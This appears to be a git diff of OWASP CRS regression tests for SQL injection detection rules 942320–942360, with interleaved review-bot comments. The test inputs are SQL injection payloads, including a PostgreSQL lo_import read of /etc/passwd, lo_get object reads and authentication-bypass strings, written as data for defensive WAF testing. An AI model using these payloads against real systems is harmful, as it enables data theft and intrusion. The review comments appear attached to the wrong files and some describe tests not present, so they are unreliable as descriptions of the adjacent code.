127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=div+(23.23+,+2)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=div+(23.23+,+2)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 9 desc: "Detects PostgreSQL bypass attempt lo_import'( - issue #2912" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 10 desc: "Detects PostgreSQL bypass attempt with lo_get(16400) - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=lo_get(16400)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - 
test_title: 942320-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=lo_get(16400)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 11 desc: "Detects PostgreSQL bypass attempt function(foo)::text - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::text" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::text" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 12 desc: "Detects PostgreSQL bypass attempt function(foo)::bigint - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::bigint" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::bigint" + version: HTTP/1.0 + output: + log_contains: id "942320" + - 
test_id: 13 desc: "Detects PostgreSQL bypass attempt function(foo)::double precision - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::double%20precision" - version: HTTP/1.0 - output: - log_contains: id "942320" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::double%20precision" + version: HTTP/1.0 + output: + log_contains: id "942320" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml index 2ebdb6753..ef72590e2 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml 
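Review bot: Tests 1–4 all carry the desc `"Detects MySQL and PostgreSQL stored procedure/function injections"`, yet each sends a different construct (`procedure analyse (`, `exec (@` plus newline, `declare @b` plus newline, `DECLARE/**/@x` plus newline), and the `@`-prefixed variable forms in tests 2–4 look like T-SQL rather than MySQL or PostgreSQL syntax. A per-test desc such as `desc: "exec (@ followed by newline"` and `desc: "DECLARE with inline comment before @variable"` would make a regression diagnosable from the test name alone. If the rule is also meant to cover MSSQL the shared wording should say so; if not, it is worth confirming these payloads are intended targets rather than incidental matches.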
@@ -1,38 +1,34 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: 942321.yaml tests: - - test_title: 942321-1 + - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode(lo_get(16200),'base64')::int - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942321" - - test_title: 942321-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16200),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942321" + - test_id: 2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: overlay(password placing $$$$ from 1)::int and id=1 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942321" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: overlay(password placing $$$$ from 1)::int and id=1 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942321" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml index 6cee8d0ce..2538176c3 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml 
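Review bot: Both tests here reuse the 942320 desc `"Detects MySQL and PostgreSQL stored procedure/function injections"`, but what actually distinguishes them is only visible in the input: the payloads are PostgreSQL-specific (`lo_get(...)`, `overlay(... placing ... from ...)`, `::int` casts) and are sent in the `User-Agent` header rather than in the query string or body. The desc should record that, e.g. `desc: "PostgreSQL lo_get() with ::int cast in User-Agent header"` and `desc: "PostgreSQL overlay() with ::int cast in User-Agent header"`, so a failure points at the header path rather than at the 942320 argument path. Presumably 942321 is the header-targeted sibling of 942320; that relationship is worth stating in the meta block, which currently has no description.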
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml 
@@ -2,93 +2,86 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942330.yaml tests: - - test_title: 942330-1 + - test_id: 1 desc: "classic SQL injection probings 1/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%22%27&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%22%27&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_id: 2 desc: "Test first backslash match ([\"'`\x5c]*?)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\\"1 or 1-" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\\"1 or 1-" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_id: 3 desc: "Test second backslash match (\x5cx(?:23|27|3d))" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\x23" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\x23" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_id: 4 desc: "Test false positive issue nr. 3205" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - "var=05111222333 - andy.surname@somedomain.com" - version: HTTP/1.0 - output: - no_log_contains: id "942330" - - test_title: 942330-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + "var=05111222333 + andy.surname@somedomain.com" + version: HTTP/1.0 + output: + no_log_contains: id "942330" + - test_id: 5 desc: "Test false positive issue nr. 
3205" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=05111222333 andy.surname@somedomain.com" - version: HTTP/1.0 - output: - no_log_contains: id "942330" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=05111222333 andy.surname@somedomain.com" + version: HTTP/1.0 + output: + no_log_contains: id "942330" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml index 901d8a697..8483bda92 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml 
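Review bot: In `test_id: 4` the `data: |` block scalar keeps its double quotes literally, so the posted body is `"var=05111222333` + newline + `andy.surname@somedomain.com"` + a trailing newline — the quote characters are part of the payload, whereas in `test_id: 5` the quotes are YAML syntax and are stripped. If the intended difference from test 5 is only the embedded newline, write `data: "var=05111222333\nandy.surname@somedomain.com"`, or keep the block scalar without the quotes and use `data: |-` to drop the trailing newline. As written, the no-match outcome could be influenced by the stray quote characters rather than by the newline handling the issue-3205 regression is meant to cover.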
@@ -2,190 +2,177 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942340.yaml tests: - - test_title: 942340-1 + - test_id: 1 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # in ( select * from - uri: "/get?var=in%20%28%20select%20%2a%20from" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # in ( select * from + uri: "/get?var=in%20%28%20select%20%2a%20from" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 2 desc: "SQLite authentication bypass with except select" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except \tselect.1,2 - uri: "/get?var=except%20%09select.1%2C2" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except \tselect.1,2 + uri: "/get?var=except%20%09select.1%2C2" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 3 desc: "SQLite authentication bypass with except values" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS 
test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except values (1,2) - uri: "/get?var=except%20values(1%2C2)" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except values (1,2) + uri: "/get?var=except%20values(1%2C2)" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 4 desc: "true-negative except selecting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except selecting - uri: "/get?var=except%20selecting" - version: HTTP/1.0 - output: - no_log_contains: id "942340" - - test_title: 942340-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except selecting + uri: "/get?var=except%20selecting" + version: HTTP/1.0 + output: + no_log_contains: id "942340" + - test_id: 5 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20array[id]%20is%20not%20null--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20array[id]%20is%20not%20null--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 6 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20email~all(array[email]);analyze--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20email~all(array[email]);analyze--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 7 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20and%20email%20not%20similar%20to%20id--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20and%20email%20not%20similar%20to%20id--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - 
test_id: 8 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20or%20true;%20foo" - version: HTTP/1.0 - output: - log_contains: id "942340" - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20or%20false;%20foo" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20or%20true;%20foo" + version: HTTP/1.0 + output: + log_contains: id "942340" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20or%20false;%20foo" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 9 desc: "basic SQL authentication bypass attempts 3/3 (no whitespace between operator)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='||true" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-10 + - input: + 
dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='||true" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_id: 10 desc: "SQL Auth Bypass FP test (invalid operator without whitespace)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='ortrue" - version: HTTP/1.0 - output: - no_log_contains: id "942340" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='ortrue" + version: HTTP/1.0 + output: + no_log_contains: id "942340" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml index 23246f00b..266403140 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml 
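Review bot: The comment above the URI in `test_id: 3` reads `# except values (1,2)`, but `except%20values(1%2C2)` decodes to `except values(1,2)` with no space before the parenthesis; the comments on tests 1 and 2 decode correctly, so this one is stale. Change it to `# except values(1,2)`, or if the space-separated variant was the intended case, encode it as `except%20values%20(1%2C2)` — but that is then a different input from what the test currently sends. Tests 5–7 also share the generic desc `"basic SQL authentication bypass attempts 3/3"` while sending distinct PostgreSQL constructs (`array[id]`, `~all(array[...])`, `similar to`); naming the construct in each desc would make failures easier to triage.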
@@ -2,73 +2,67 @@ meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" description: None - enabled: true - name: 942350.yaml tests: - - test_title: 942350-1 + - test_id: 1 desc: "MySQL UDF injection and other data/structure manipulation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # ; insert INTO table (word) VALUES('dfsd') - uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" - version: HTTP/1.0 - output: - log_contains: id "942350" - - test_title: 942350-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ; insert INTO table (word) VALUES('dfsd') + uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" + version: HTTP/1.0 + output: + log_contains: id "942350" + - test_id: 2 desc: "Fix for FP reported in GitHub issue 1587" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # ;insertion_424242 - uri: "/get?var=%3Binsertion_424242" - version: HTTP/1.0 - output: - no_log_contains: id "942350" - - test_title: 942350-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ;insertion_424242 + uri: "/get?var=%3Binsertion_424242" + version: HTTP/1.0 + output: + no_log_contains: id "942350" + - test_id: 3 desc: "MySQL create function injection" stages: - - stage: - input: - 
dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); - uri: "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" - version: HTTP/1.0 - output: - log_contains: id "942350" - - test_title: 942350-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); + uri: "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" + version: HTTP/1.0 + output: + log_contains: id "942350" + - test_id: 4 desc: "Status Page Test - MySQL injection with ;truncate[xx" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=;truncate[xx" - version: HTTP/1.0 - output: - log_contains: id "942350" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=;truncate[xx" + version: HTTP/1.0 + output: + log_contains: id "942350" 
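Review bot: The comment above test 1's URI does not describe the payload that is actually sent: `# ; insert INTO table (word) VALUES('dfsd')` sits over `uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES"`, which decodes to `;INSERT INTO table (col) VALUES` — a different column name and no value list. These decoded comments are what a reviewer uses to judge whether a regression test still exercises the intended attack surface, so the comment should match the encoded string, e.g. `# ;INSERT INTO table (col) VALUES`. The `test_title` to `test_id` migration otherwise appears to carry payloads and expectations over unchanged, as far as the visible lines show. Separately, `description: None` in `meta` is the plain string "None" rather than a YAML null; if no description is intended, `null` or omitting the key is less ambiguous.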
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml index 860b3b966..3246860f4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml 
@@ -2,670 +2,629 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" description: None - enabled: true - name: 942360.yaml tests: - - test_title: 942360-1 + - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_id: 2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + 